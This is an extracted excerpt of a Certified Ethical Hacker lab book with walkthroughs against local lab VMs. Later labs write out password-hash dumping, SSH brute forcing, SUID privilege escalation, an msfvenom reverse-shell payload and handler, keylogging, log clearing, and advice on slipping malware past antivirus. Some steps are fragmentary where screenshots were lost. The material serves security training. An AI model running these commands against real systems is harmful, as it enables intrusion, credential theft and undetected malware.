Professional Documents
Culture Documents
Ceh
Ceh
Copyright Notice
Copyright © 2022 Paul Browning, all rights
reserved. No portion of this book may be
reproduced mechanically, electronically, or
by any other means, including photocopying
without written permission of the publisher.
https://www.101labs.net
ISBN: 9798825582177
Published by:
Reality Press Ltd.
Legal Notice
The advice in this book is designed to help
you achieve the standard of a Certified
Ethical Hacker and Certified Ethical Hacker -
Master engineer. Before you carry out more
complex operations, it is advisable to seek the
advice of experts.
Paul Browning
—Paul Browning
https://www.eccouncil.org/
https://www.101labs.com/resources
101ceh
Instructions
1. Please follow the labs from start to
finish. If you get stuck, do the next lab
and come back to the problematic lab
later. There is a good chance you will be
able to work out the solution as you gain
confidence and experience in configuring
the software and using the commands.
2. You can take the labs in any order, but
we’ve done our best to present them in
increasing difficulty to build up your
skill level as you go along incrementally.
For best results, do ALL the labs several
times over before attempting the exam.
3. There are resources as well as
configuration files for all the labs at
www.101labs.net/resources.
4. Please DO NOT configure these labs on
a live network or equipment belonging to
private companies or individuals.
5. Please DO NOT attempt to configure
these labs on other Linux distros. We’ve
chosen Kali for the labs due to it being
the most popular Linux distribution
among security experts.
6. You MUST be reading or have read a
CEH study guide or watched a theory
video course. Apart from some
configuration tips and suggestions, we
don’t explain much theory in this book;
it’s all hands-on labs.
7. It’s impossible for us to give individual
support to the thousands of readers of
this book (sorry!), so please don’t contact
us for tech support. Each lab has already
been tested by several tech editors, of
abilities ranging from beginner to expert.
Lab Objective:
Learn how to create your own lab
environment as well as some hacking
terminology.
Lab Purpose:
In this lab, we’ll go through the process of
making your own lab environment where you
can safely practice ethical hacking. In
addition to that, we’ll be introducing some
concepts and terminology that exist within
the cyber security world.
Lab Tool:
VMware or other Virtual Machine
hypervisors.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
The first step here would be to download a
Kali Linux Virtual Machine (VM) image file,
suitable to your CPU architecture (x86, x64,
ARM etc.), from this URL:
https://www.kali.org/get-kali/#kali-virtual-
machines. It is recommended to run Kali, and
all other Operating Systems (OS) in a VM for
security reasons, to see how we’ll be working
with dangerous files (such as viruses) in the
future. In addition to that, we’re creating our
own lab environment because we aim to be
ethical hackers, otherwise known as white-hat
hackers. There are also black and gray-hat
hackers, which are engaged in illegal or
borderline legal hacking, respectively. In the
broadest sense, a hacker is simply an
individual that uses things in a way they are
not intended to be used.
Feel free to use whichever VM software you
like; mine is VMware Workstation Pro. Once
you download and install the VM software of
your choice, install the VM image, then pick
the option to open a pre-existing VM file, like
in the screenshot below.
https://www.vulnhub.com/entry/owasp-
broken-web-applications-project-12,46/.
https://www.vulnhub.com/entry/metasploitable-
2,29/.
Lab Objective:
Learn how to find information on a particular
target using search engines like Google.
Lab Purpose:
In this lab, we’ll look into leveraging search
engines to discover particular information
about our targets. Because our lab VMs are
all locally hosted, we’ll have to look at some
publicly available domains.
Lab Tool:
Google.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
Everyone is using search engines on a daily
basis, but not everyone knows that search
engines have special queries that allow us to
look up very specific information about a
target. In this lab, you’ll be introduced to a
couple of those queries, ones that I’ve found
most useful in my ethical hacking endeavors.
Lab Objective:
Learn how to gain information on Top-Level
Domains (TLDs) and subdomains.
Lab Purpose:
In this lab, we’ll look into another passive
reconnaissance technique, and that is looking
up TLD and subdomains of a particular
target. This information is crucial because,
depending on the scope of a particular
penetration test, we can leverage
vulnerabilities in other parts of the client’s
infrastructure in order to gain a foothold on
our main target.
Lab Tool:
Netcraft.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
TLDs are essentially the topmost domains in
the hierarchical Domain Name System (DNS)
of the internet, with only the root domain
above them. Subdomains, on the other hand,
are additional, specific “branches” to your
main domain name. For example, a URL of
www.google.com contains the following
information: the subdomain is www and its
TLD is com. The more you know about a
target, the greater the likelihood of successful
exploitation as your attack surface increases.
For the purpose of this lab, we will be using
the following web applications:
https://sitereport.netcraft.com.
https://pentest-tools.com/.
The former allows us to gain insight into a
target’s setup, such as IP address, owner,
geolocation and more. The latter can be used
to enumerate subdomains, for example, but a
lot more besides that. As always, you are
encouraged to explore on your own. For now,
type in google.com in both web apps:
https://sitereport.netcraft.com/?
url=google.com.
https://pentest-tools.com/information-
gathering/website-reconnaissance-discover-
web-application-technologies.
Lab Objective:
Learn how to perform OSINT using social
networking websites.
Lab Purpose:
In this lab, we’ll look into another technique
for gathering information about our targets in
the form of passive reconnaissance. This time
we’ll look at social media presence and the
wealth of information it can contain.
Lab Tool:
Osintgram.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
Social media, or social networks, oftentimes
contain more information than necessary.
People leave all sorts of data on places like
Twitter, Facebook, Instagram, etc. This can
be leveraged for things like social-
engineering campaigns (think phishing
emails), brute forcing user accounts (through
username harvesting), and sometimes,
thankfully not too often, people will, by
accident, post passwords on social networks.
Lab Objective:
Learn how to perform passive recon using
Shodan.
Lab Purpose:
Shodan is an incredibly powerful search
engine, essentially allowing you to look up
any and all devices connected to the internet,
such as computers, cameras, and more. In this
lab, we’ll see how we can leverage that
information for our ethical hacking
endeavors.
Lab Tool:
Shodan.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
Shodan essentially contains information on
Internet of Things (IoT) devices. We can
query for devices in different ways, and some
of the more common queries are listed on the
homepage.
Lab Objective:
Learn how to utilize web spiders to discover
interesting web application elements.
Lab Purpose:
In this lab, we’ll go through web spiders,
tools that interact with a web application,
probing it for elements that may not be
immediately obvious to the human eye.
Lab Tool:
BurpSuite.
Lab Topology:
You can use Kali Linux and Metasploitable
in a VM for this lab.
Lab Walk-Through:
Since this is the first time we’ll actually be
using a native tool on our Kali machine, it’s a
good idea to make sure everything is up to
date with the following set of commands:
apt update
apt upgrade
apt install burpsuite zaproxy
in CLI/terminal.
Lab Objective:
Learn how to perform website mirroring.
Lab Purpose:
Website mirroring is a useful skill to have as
a penetration tester, especially if social
engineering is within scope of your
penetration testing engagement.
Lab Tool:
HTTrack.
Lab Topology:
You can use Kali Linux and Metasploitable
in a VM for this lab.
Lab Walk-Through:
Website mirroring is basically copying an
entire web application, or some parts of it,
depending on what our end goal is. This is
useful if we want to trick someone into
believing we are hosting a legitimate site for
the purpose of, for example, credential
harvesting. Let’s begin with the command:
apt install httrack
httrack --help
Lab Objective:
Learn how to use the Wayback Machine to
gather OSINT on targets.
Lab Purpose:
In this lab, we’ll look into gathering
seemingly outdated and forgotten yet crucial
data on our clients and, more specifically,
client web applications.
Lab Tool:
Wayback Machine.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
The Wayback Machine is an archive of web
application snapshots. It essentially contains
copies of web applications at various points
in time, capturing some (but not all) of the
contents of the application in question. This
can allow us, as ethical hackers, to glean
information such as previously available
endpoints, configuration and backup files and
more.
Lab Objective:
Learn how to analyze metadata from publicly
available documents.
Lab Purpose:
Metadata is information embedded within
files of various types. This data can contain
things such as OS version, GPS coordinates
and more. In this lab, we’ll look at how we
can harvest and analyze that data.
Lab Tool:
FOCA.
Lab Topology:
You can use Windows in a VM for this lab.
Lab Walk-Through:
The tool presented in this lab works on
Windows only, so we’ll be using that as our
VM. Once the VM boots up, go to the
following URLs:
https://www.microsoft.com/en-us/sql-
server/sql-server-downloads.
https://github.com/ElevenPaths/FOCA/releases
Lab Objective:
Learn how to access Whois database
information.
Lab Purpose:
Whois is essentially a database of information
pertaining to a particular domain name. This
information includes things such as domain
registrar name, IP addresses and blocks, and
more.
Lab Tool:
Whois.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
Whois can be invoked in an incredibly simple
way, just type:
whois google.com
Lab Objective:
Learn how to perform DNS footprinting
using various tools.
Lab Purpose:
We’ve already touched upon the topic of
TLD and subdomain enumeration in one of
our previous labs. In this one, we’ll look at
Kali Linux native tools designed specifically
to address this portion of information
gathering.
Lab Tool:
DNSenum.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
For this lab, we’ll have to install a wordlist
compilation called SecLists:
apt update
apt install seclists
Lab Objective:
Learn how to perform network footprinting
via subnetting and traceroute.
Lab Purpose:
Subnetting is the art of splitting a particular
IP network into smaller segments, while
tracerouting enables us to see the path a
packet takes from our device (Kali Linux) all
the way to the target. This has the potential to
help us identify any obstacles along the way.
Lab Tool:
Traceroute.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
This particular lab will contain a bit more
theory than most others, but it is crucial that
you understand subnetting well as it is
expected of you to be familiar with it by
virtually all cyber security certifications out
there, CEH included.
Lab Objective:
Learn how to use Maltego and perform
OSINT investigations.
Lab Purpose:
In this and the next couple of labs, we’ll look
into OSINT tools, the first one on the list
being Maltego, an industry standard when it
comes to Open-Source Intelligence gathering.
Lab Tool:
Maltego.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
Just in case it’s not installed in your version
of Kali, depending on when you go through
these labs, we’ll run the following commands
to ensure Maltego is present on our system:
apt update
apt install maltego
Lab Objective:
Learn how to use Recon-ng for OSINT
gathering.
Lab Purpose:
Recon-ng is another tool in our toolbelt that
can help us gather information on our targets.
OSINT is good because it gathers publicly
available data, meaning we do not interact
with our target directly.
Lab Tool:
Recon-ng.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
In order to use Recon-ng to its full potential,
you must have access to API keys. Before
anything, some preparatory steps:
apt update
apt install recon-ng
recon-ng
workspaces create ceh
marketplace refresh
marketplace install all
keys list
for example.
These can, as before, when we get access to
information such as emails, be used for social
engineering, brute force attacks, etc.
Lab Objective:
Learn how to use Recon-dog for OSINT.
Lab Purpose:
Another tool in our OSINT gathering arsenal
is Recon-dog. Let’s look at how to use it in
this lab.
Lab Tool:
Recon-dog.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
In order to use Recon-dog, we first have to
download it from GitHub, so let’s do just
that:
git clone
https://github.com/s0md3v/ReconDog.git
cd ReconDog
chmod +x dog
./dog
Lab Objective:
Learn how to perform OSINT lookups using
OSRFramework.
Lab Purpose:
OSRFramework (OSRF) is the last OSINT
tool we’ll be looking into in these labs. Most
other OSINT tools aren’t concerned with
things like usernames or phone numbers;
instead, they look only for domains and their
associated information. OSRF fills in those
gaps and does so rather well.
Lab Tool:
OSRFramework.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
As always, let’s make sure the tool is
installed on our Kali VM with the commands:
apt update
apt install osrframework
osrf --help
Lab Objective:
Consolidate knowledge on passive
reconnaissance and OSINT.
Lab Purpose:
In this lab, we’ll look at most, if not all,
passive recon and OSINT tools we’ve worked
with in the labs up to this one. We’ll try to
make things concise and meaningful.
Lab Tool:
Kali Linux.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
To start things off, let’s use Google to look
up some information on eccouncil.org with
the query:
site:eccouncil.org filetype:pdf
Lab Objective:
Learn how to perform basic scans using
Nmap.
Lab Purpose:
Nmap is, as its name implies, a network
mapper, an industry standard, and probably
one of the most used tools in all of
penetration testing. In this lab, we’ll look into
its most basic functionality.
Lab Tool:
Nmap.
Lab Topology:
You can use Kali Linux and Metasploitable
in a VM for this lab.
Lab Walk-Through:
So, once you boot up Kali and
Metasploitable, log into both and then
proceed to identify the correct IP addresses. If
you set up your lab correctly, they should be
on the same network; in my case, that’s
192.168.77.0/24 (refer to the lab on
subnetting to understand what this means).
Specifically, my Kali is on the IP address of
192.168.77.128 and Metasploitable is
192.168.77.154. With that out of the way, we
can get down to using Nmap. Again, let’s
check out its help menu:
nmap --help
Lab Objective:
Learn how to perform advanced scans using
Nmap.
Lab Purpose:
In this lab, we’ll expand upon our usage of
Nmap to see more of its functionality.
Lab Tool:
Nmap.
Lab Topology:
You can use Kali Linux and Metasploitable
in a VM for this lab.
Lab Walk-Through:
The more advanced the scans we intend to
run become, the more time-consuming and
stressful to the target they are going to be.
Not only that, but they are also likely to leave
a massive number of logs on the target, so
they are not exactly stealthy. That is why, as
we increase the “depth” of our scans, we
must reduce the width, and the simplest way
in which we can do so is by running these
advanced scans against only a select number
of ports. Now, in our previous lab, we ran
Nmap without any port specifications. That
means Nmap used its default approach of
scanning the 1000 most popular TCP and
UDP ports (remember that there are 65535
ports on both TCP and UDP). Now, this
leaves out 64535 ports untested, and they too
can potentially host various services. Because
we saw UDP took a significantly longer time
than TCP, scanning all 65535 UDP ports is
likely not going to be a good time investment,
but scanning 65535 TCP ports seems
feasible, especially in a local lab like ours, so
let’s do just that:
nmap -p- 192.168.77.154
Lab Objective:
Learn how to perform firewall and IDS
evasion while scanning with Nmap.
Lab Purpose:
In this lab, we’ll introduce you to the basics
of firewall and IDS evasion using Nmap. We
won’t be going too deep when it comes to
this because the deterrent landscape changes
all the time, and it is up to the penetration
tester to determine the best approach
considering the defensive measures in place
for each particular engagement.
Lab Tool:
Nmap.
Lab Topology:
You can use Kali Linux and Windows 7 in a
VM for this lab.
Lab Walk-Through:
We’ll be using Windows 7 as our target of
choice because it has at least some, albeit
rudimentary, firewall built into itself, unlike
Metasploitable and OWASP VMs, which
have none whatsoever. So, we’ll have to
check the IP address, which in Windows is
done with the command:
ipconfig /all
Lab Objective:
Learn how to perform banner grabbing using
Ncat.
Lab Purpose:
Ncat is an upgraded version of Netcat, the so-
called TCP/IP Swiss Army knife. It comes
bundled with Nmap and is actively developed
alongside it. We’ll look at its most basic
functionality within this lab.
Lab Tool:
Ncat.
Lab Topology:
You can use Kali Linux, Metasploitable and
OWASP Broken Web Applications Project
(BWA) in a VM for this lab.
Lab Walk-Through:
Ncat is an incredibly versatile tool, hence its
above-mentioned nickname. While it might
not be pre-installed on most Linux
distributions, its syntax is the same as that of
Netcat, its older cousin. We’ll be working
with Ncat because it’s just better, but for all
intents and purposes, you can extrapolate
functionality and syntax into Netcat, should
you encounter it on your ethical hacking
adventures.
Lab Objective:
Consolidate knowledge on the network
scanning portion of active reconnaissance.
Lab Purpose:
Here’s another lab where we’ll look back at
the tools we’ve examined in order to see how
they can give us information to direct the next
steps of our penetration testing engagement.
Lab Tool:
Kali Linux.
Lab Topology:
You can use Kali Linux and Metasploitable
in a VM for this lab.
Lab Walk-Through:
Not a lot of tools here, but a lot of
functionality, so let’s get to it.
Lab Objective:
Learn how to perform NetBIOS enumeration
on Windows 7.
Lab Purpose:
NetBIOS stands for Network Basic
Input/Output System. It allows applications
on separate computers within the same Local
Area Network (LAN) to communicate. It is
not a networking protocol but an API
(Application Programming Interface). In this
lab, we’ll look at local enumeration of
NetBIOS.
Lab Tool:
Nbtstat.
Lab Topology:
You can use Windows 7 in a VM for this lab.
Lab Walk-Through:
Local enumeration differs from remote
(which is what we’ve been doing thus far) in
that it requires access to the target. In other
words, we will do this lab with the
presupposition that we’ve already achieved
initial foothold onto our Windows 7 target
VM, and are looking for more information to
potentially escalate our privileges.
Lab Objective:
Learn how to perform SNMP enumeration.
Lab Purpose:
SNMP (Simple Network Management
Protocol) is, if available, probably the best
source of information on a target that you can
wish for as an ethical hacker. It most
commonly runs on UDP port 161 and, as the
name (sort of) implies, its purpose is the
management of various systems on a
networked device.
Lab Tool:
SNMP-check.
Lab Topology:
You can use Kali Linux and Windows 7 in a
VM for this lab.
Lab Walk-Through:
Before we proceed with running our
enumerating tool of choice, we have to enable
SNMP on our Windows VM. To do that, go
to Control Panel → Programs and Features
→ Turn Windows features on or off →
enable Simple Network Management
Protocol and its “child” WMI SNMP
Provider.
After that, go back to Control Panel and
select Administrative Tools → Services →
SNMP Service → Properties → Security →
Add an Accepted community name of
“public” and Accept SNMP packets from any
host. Click Apply → OK, then restart the
service from the same menu.
Now, we’re good to go and can check out this
amazing repository of information with the
command:
snmp-check 192.168.77.156
And voila, it’s as simple as that. Just look at
all the data we’ve been able to uncover; it
cannot even fit within a single screen!
Lab Objective:
Learn how to perform SMTP enumeration.
Lab Purpose:
We’ve already looked at the primary purpose
behind SMTP enumeration, and that is the
discovery of usernames on a target. That is
why we’ll use this lab as an opportunity to
introduce an incredibly powerful tool.
Lab Tool:
Metasploit Framework.
Lab Topology:
You can use Kali Linux and Metasploitable
in a VM for this lab.
Lab Walk-Through:
Metasploit Framework (MSF) is one of the
most versatile and ubiquitous tools in the
industry. It can integrate with Nmap, perform
information gathering, exploitation, privilege
escalation, and more. Of course, it can do
none of that without proper guidance by a
skilled, ethical hacker, so it’s important to
familiarize ourselves with the tool. In this lab,
we’ll use it to perform an automated
username enumeration via SMTP, so let’s
start the tool with the command:
msfdb run
workspace -a ceh
Lab Objective:
Learn how to perform Server Message Block
(SMB) enumeration.
Lab Purpose:
SMB is a communication protocol that
Microsoft created for providing shared access
to files and printers across nodes on a
network. For an ethical hacker, it’s on par
with SNMP when it comes to the information
that can be accessed should this service be
available and insecurely implemented on a
target.
Lab Tool:
Enum4linux.
Lab Topology:
You can use Kali Linux and Metasploitable
in a VM for this lab.
Lab Walk-Through:
SMB is already up and running on our
Metasploitable target, so all we have to do is
point Enum4linux towards it. Now, in order
to know how to do that, we, of course, have
to first access its help menu:
enum4linux --help
Lab Objective:
Wrap up all that we have learned about
services enumeration.
Lab Purpose:
In this lab, we’ll look back at all of the
enumeration we’ve done so far and see how
we can infer “low-hanging fruit” and
potential avenues of attack. To top it off,
we’ll perform simple exploitation of our
Metasploitable VM.
Lab Tool:
Kali Linux.
Lab Topology:
You can use Kali Linux and Metasploitable
in a VM for this lab.
Lab Walk-Through:
Let’s start things off with SNMP enumeration
against our Metasploitable VM. To make
Metasploitable’s SNMP service accessible to
an external machine, we need to do the
following:
Lab Objective:
Learn how to perform vulnerability
assessments using Nessus.
Lab Purpose:
Nessus is one of the most well-known
vulnerability scanners in the industry. In this
lab, we’ll look into its features, pros and
cons.
Lab Tool:
Nessus.
Lab Topology:
You can use Kali Linux and Metasploitable
in a VM for this lab.
Lab Walk-Through:
Due to the length of this lab, we’ll skip over
the installation of Nessus. As stated multiple
times already, this level of knowledge is
expected if you are looking at CEH.
Lab Objective:
Learn how to perform vulnerability
assessments using OpenVAS.
Lab Purpose:
In this lab, we’ll look at Nessus’ open-source
counterpart OpenVAS, another vulnerability
assessment scanner that’s commonly used in
cyber security.
Lab Tool:
OpenVAS.
Lab Topology:
You can use Kali Linux and Metasploitable
in a VM for this lab.
Lab Walk-Through:
Unlike Nessus, which has to be downloaded
from a third-party website and then manually
installed, OpenVAS can be installed directly
from within Kali with the commands:
apt update
apt install openvas* gvm*
gvm-setup
gvm-check-setup
gvm-start
Lab Objective:
Learn how to steal passwords from
vulnerable targets.
Lab Purpose:
We’ll look into another potential avenue of
attack, and that is harvesting passwords
and/or password hashes from targets that
have vulnerable or misconfigured services.
Lab Tool:
Metasploit Framework.
Lab Topology:
You can use Kali Linux and Metasploitable
in a VM for this lab.
Lab Walk-Through:
Let’s fire up our trusty friend MSF, search for
PostgreSQL password hashdump module and
point it towards our Metasploitable VM:
msfdb run
search type:auxiliary name:postgre
use auxiliary/scanner/postgres/postgres_hashdump
options
set RHOSTS 192.168.77.154
run
Lab Objective:
Learn how to perform local password
cracking using John the Ripper.
Lab Purpose:
In this and the next lab, we’ll conclude our
exploitation efforts with the most time-
intensive (and often resource) attacks,
password cracking and brute forcing.
Lab Tool:
John the Ripper.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
Up to this point, we’ve mostly been gathering
various types of information, and its finally
time to put it all to use. Let’s go ahead and
take the password hash obtained in the
previous lab
(md53175bce1d3201d16594cebf9d7eb3f9d)
and see how we can crack it.
Lab Objective:
Learn how to perform remote password brute
forcing using THC-Hydra.
Lab Purpose:
This is the final lab in our password cracking
segment and one in which we’ll finally gain
access to a target machine.
Lab Tool:
THC-Hydra.
Lab Topology:
You can use Kali Linux and Metasploitable
in a VM for this lab.
Lab Walk-Through:
What we’ll do in this lab is probably the most
intensive attack on a target and should be
done as a last resort. We’re going to take the
username values from our SMTP
enumeration lab, a wordlist with over 10
million potential passwords and launch this
attack against Metasploitable’s SSH service
on port 22. So, let’s do just that with the
commands:
cp /usr/share/wordlists/rockyou.txt .
echo postgrespostgres >> rockyou.txt
echo
“msfadmin\nbackup\nbin\ndaemon\ndistccd\nftp\ngames\ngnats\nirc\nlibu
data” > usernames
hydra -L usernames -P rockyou.txt 192.168.77.154 -t 4
ssh
ssh -oHostKeyAlgorithms=+ssh-dss
msfadmin@192.168.77.154
And voila, we got shell access via SSH
(literally “Secure Shell”) and can now
proceed to the next stage of a penetration test,
privilege escalation.
Lab Objective:
Consolidating knowledge on password
attacks.
Lab Purpose:
Let’s look back at what we’ve learned
regarding password cracking and how we can
use it as a single “unit.”
Lab Tool:
Kali Linux.
Lab Topology:
You can use Kali Linux and Windows 7 in a
VM for this lab.
Lab Walk-Through:
So, the topics we’ve covered with password
related attacks are password harvesting,
remote brute forcing and local cracking. Note
that some of these labels can be used
interchangeably, such as local brute forcing
or remote cracking, etc.
Lab Objective:
Learn how to perform privilege escalation
from locally discovered vulnerabilities.
Lab Purpose:
Privilege escalation is the next step of a
penetration test. Once we’ve established
initial foothold in the exploitation phase, we
now have to look at ways to escalate our
privileges and become as powerful a user as
we possibly can on a given target.
Lab Tool:
LinEnum.
Lab Topology:
You can use Kali Linux and Metasploitable
in a VM for this lab.
Lab Walk-Through:
Seeing how we already have shell access to
our target privilege escalation most
commonly revolves around using
misconfigured tools and services already
available on the target, and also applications
with known vulnerabilities, exploits for
which can be run locally to facilitate privesc.
Or this one:
Some other interesting findings:
And:
Now, we can have our pick, and I’m going to
go with SUID on /usr/bin/nmap. To exploit
these kinds of things, an excellent repository
is https://gtfobins.github.io/. To exploit this
bit of misconfiguration, type the following:
/usr/bin/nmap –interactive
!sh
id
Lab Objective:
Learn how to run local apps on a Windows
target.
Lab Purpose:
We’ve already run some local apps on Linux
targets (remember using Nmap for privilege
escalation). In this lab, we’ll look at what’s
possible when it comes to running local apps
on a Windows target, the pros and cons as
well as comparing it to Linux.
Lab Tool:
Remote Desktop Protocol.
Lab Topology:
You can use Kali Linux and Windows 7 in a
VM for this lab.
Lab Walk-Through:
To access our Windows 7 VM via SSH, we
need to do the following on our Kali box:
ssh IEUser@192.168.77.156
Lab Objective:
Learn how to perform keylogging.
Lab Purpose:
Keylogging is the act of capturing keyboard
inputs from a target machine. This is done in
order to potentially harvest credentials or see
the daily habits of a client.
Lab Tool:
Meterpreter.
Lab Topology:
You can use Kali Linux and Windows 7 in a
VM for this lab.
Lab Walk-Through:
Now, while you can create a piece of
malware that is custom-made and unique,
whose sole purpose is to capture keystrokes,
that’s outside the scope of this lab. What
we’ll do instead is use keylogging capability
of an incredibly powerful payload called
Meterpreter. Meterpreter interacts with MSF
and gives us incredible utility. To create a
Meterpreter payload, we need to invoke the
following:
msfvenom -p windows/meterpreter/reverse_tcp -f exe -a
x86 --platform windows LHOST=192.168.77.128
LPORT=1234 -o meterpreter.exe
Lab Objective:
Learn how to hide key data in inconspicuous
files.
Lab Purpose:
Steganography is the art (or technique) of
hiding critical information within seemingly
unimportant files. For those of you who’ve
watched the TV show Mr. Robot, it’s what
Elliot does to hide data within music CDs.
Lab Tool:
Steghide.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
Before anything, you’re going to be needing
an image file, a picture of some sort. Either
use your own or one that has no royalties
attached to it. After you get that, place it into
your present working directory, then type:
steghide --help
Lab Objective:
Learn how to clean your tracks after a
successful exploitation.
Lab Purpose:
Every good hacker knows that it is paramount
to leave no tracks on your target. We, as
ethical hackers, need to emulate, as closely as
possible, the behavior of black-hat hackers,
so we too must cover our tracks and work to
be as stealthily as we can.
Lab Tool:
Meterpreter
Lab Topology:
You can use Kali Linux and Windows 7 in a
VM for this lab.
Lab Walk-Through:
In order to clear some logs, we first have to
make some logs. So, let’s exploit our
Windows VM via the meterpreter.exe that
we’ve used in one of our previous labs. As
before, we have to set up MSF to “catch” our
reverse connection:
msfdb run
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.77.128
set LPORT 1234
run
:wq
upload skyline.jpg
Lab Objective:
A wrap-up on all of our post-exploitation
labs.
Lab Purpose:
In this lab, we’ll look at everything we’ve
learned with regards to post-exploitation,
starting from password attacks, over local
vulnerability exploitation, executing local
apps, keyloggers, and hiding files to clearing
logs.
Lab Tool:
Kali Linux.
Lab Topology:
You can use Kali and Windows 7 Linux in a
VM for this lab.
Lab Walk-Through:
So, let’s start everything in order. First, we
perform remote password brute force attacks
against Windows’ SSH service with the
command:
hydra -l IEUser -P passwords -t 4 192.168.77.156 ssh
Lab Objective:
Learn about different types of malware and
how we can create a basic one.
Lab Purpose:
While we’ve already worked with
MSFVenom, this time, the tool we’ll be using
in this lab, we’re going to dive deeper into its
functionality, as well as what exactly
malware, a trojan, a virus, etc., is.
Lab Tool:
MSFVenom.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
So first, a bit of theory: what is malware,
what are trojans, viruses, worms, and
ransomware? Well, all malicious software is
malware (MALicious + softWARE), and
trojans, viruses, worms and ransomware all
fall under that umbrella term. Trojans, in turn,
are all malware disguised to look like
legitimate, benevolent/useful software. Let’s
say you hide some exploit code within a
video game executable; that video game
executable becomes a Trojan horse for your
exploit code. Viruses are the type of malware
that cannot propagate on their own and
instead require user interaction to do so.
Worms, on the other hand, can propagate on
their own, and that’s the main difference
between the two. Ransomware is malware
designed with the specific purpose of
requesting ransom from you—most often in
the form of cryptocurrency payments. In
order to hold its sway over you, the
ransomware most commonly encrypts your
filesystem, rendering you unable to use it and
have access to your files.
windows/meterpreter_reverse_tcp
windows/meterpreter/reverse_tcp
Lab Objective:
Learn how to perform basic malware
obfuscation using MSFVenom.
Lab Purpose:
So, we’ve created our malware. However,
pretty much all Anti-Virus (AV) software
catches it, and we are unable to use it. What
do we do? Check it out in this lab.
Lab Tool:
MSFVenom.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
Remember how, in the firewall and IDS
evasion lab, we mentioned that most
defensive mechanisms work based on
signatures? That’s not always the case and is
an oversimplification, but it does form the
basis for things such as AV, anti-malware,
etc. Still, computers get infected even in this
day and age . . . how? That’s where
obfuscation techniques come into play, some
of which we’ll look into, for example,
encoders, the topic of this lab.
Lab Objective:
Learn how to create a trojan using
MSFVenom.
Lab Purpose:
Now that we’ve seen how it may be possible
to trick an application such as an AV, let’s
see how we can trick fellow humans.
Lab Tool:
MSFVenom.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
We’ve had a lab on steganography, but an
exploit hidden like that is not a trojan. Why?
Well, because if someone opens the pictures,
we’ve hidden our exploit in, nothing will
happen; the exploit code will not execute.
With trojans, the intended consequence is that
the hidden code gets executed, so let’s see
how we can do just that.
Lab Objective:
Learn how to perform additional obfuscation
using Veil.
Lab Purpose:
Veil is a tool specifically designed to
facilitate evasion of defensive measures on
our ethical hacking targets.
Lab Tool:
Veil.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
Before anything, let’s make sure Veil is
installed and is the latest version on our Kali
box:
apt update
apt install veil
veil
Lab Objective:
Consolidation of malware-related knowledge.
Lab Purpose:
Like in the previous wrap-up labs, we’re
going to look back at everything we’ve
learned pertaining to malware and work
towards creating as stealthy a malware as
possible.
Lab Tool:
MSFVenom.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
One very important thing we haven’t
mentioned this far is that, while you might
feel inclined and that it is the best course of
action to just have an undetectable malware
at the ready and use it in every situation,
regardless of the specific target technologies,
this is almost never a good idea. Instead, what
is considered best practice, is enumerating
your target thoroughly and then, based on that
information, creating only the bare minimum
necessary to achieve exploitation. The reason
for this approach is twofold: No1: it saves
time, simple tools, ideas and actions usually
take significantly less time than highly
complex ones, and No2: it allows you to
always have an “ace up your sleeve.” Let’s
say that, for example, you identified a
particular AV on a target, and you’ve created
malware that can bypass that AV but not
much else. The malware does its thing but, in
the process, you’ve sent it to VirusTotal in
order to check whether it’ll pass or not. Now,
VirusTotal has shared that signature with AV
vendors, and your malware no longer works.
You can add a bit of complexity to it, and it’ll
pass again, and so on. If you launch a highly
sophisticated malware immediately and its
specific signature gets flagged by AVs, you
are left with nothing that’ll work.
Lab Objective:
Learn how to perform a MAC flooding
attack.
Lab Purpose:
MAC flooding is a type of attack in which
legitimate MAC table contents are being
replaced with the attacker’s desired ones by
sending unicast flooding to network switches.
Lab Tool:
Macof.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
MAC stands for Media Access Control and is
the address of a networked device on a
hardware level. Each Network Interface Card
(NIC) has its MAC address set by the
manufacturer. This can, of course, be
changed, but for now, we’ll treat it like it’s a
fingerprint of a NIC.
Next, type:
macof -i eth0
Lab Objective:
Learn how to perform a DHCP starvation
attack.
Lab Purpose:
DHCP stands for Dynamic Host
Configuration Protocol and is responsible for
assigning IP addresses to networked devices.
In this lab, we’ll look into how we can abuse
that protocol to suit our ethical hacking
needs.
Lab Tool:
Yersinia.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
So, why would we need to abuse DHCP
services? Well, in order to trick other devices
on a network into thinking we are who we
want to be (for example, the network’s
default gateway). Doing so would allow us to
perform Man-In-The-Middle (MITM) attacks
and analyze the target network’s traffic.
DHCP starvation can be thought of as one of
the potential steps towards achieving MITM
attacks.
Lab Objective:
Learn how to create a rogue DHCP server.
Lab Purpose:
In the previous lab, we’ve seen how to
perform a DHCP starvation attack. In this
one, we’ll look at furthering that attack vector
by introducing our own rogue DHCP server
to “substitute” the legitimate one, thus
allowing us to issue IP addresses as we see fit
(and, by extension, position ourselves where
we want in the network landscape).
Lab Tool:
Ettercap.
Lab Topology:
You can use Kali Linux in a VM for this lab.
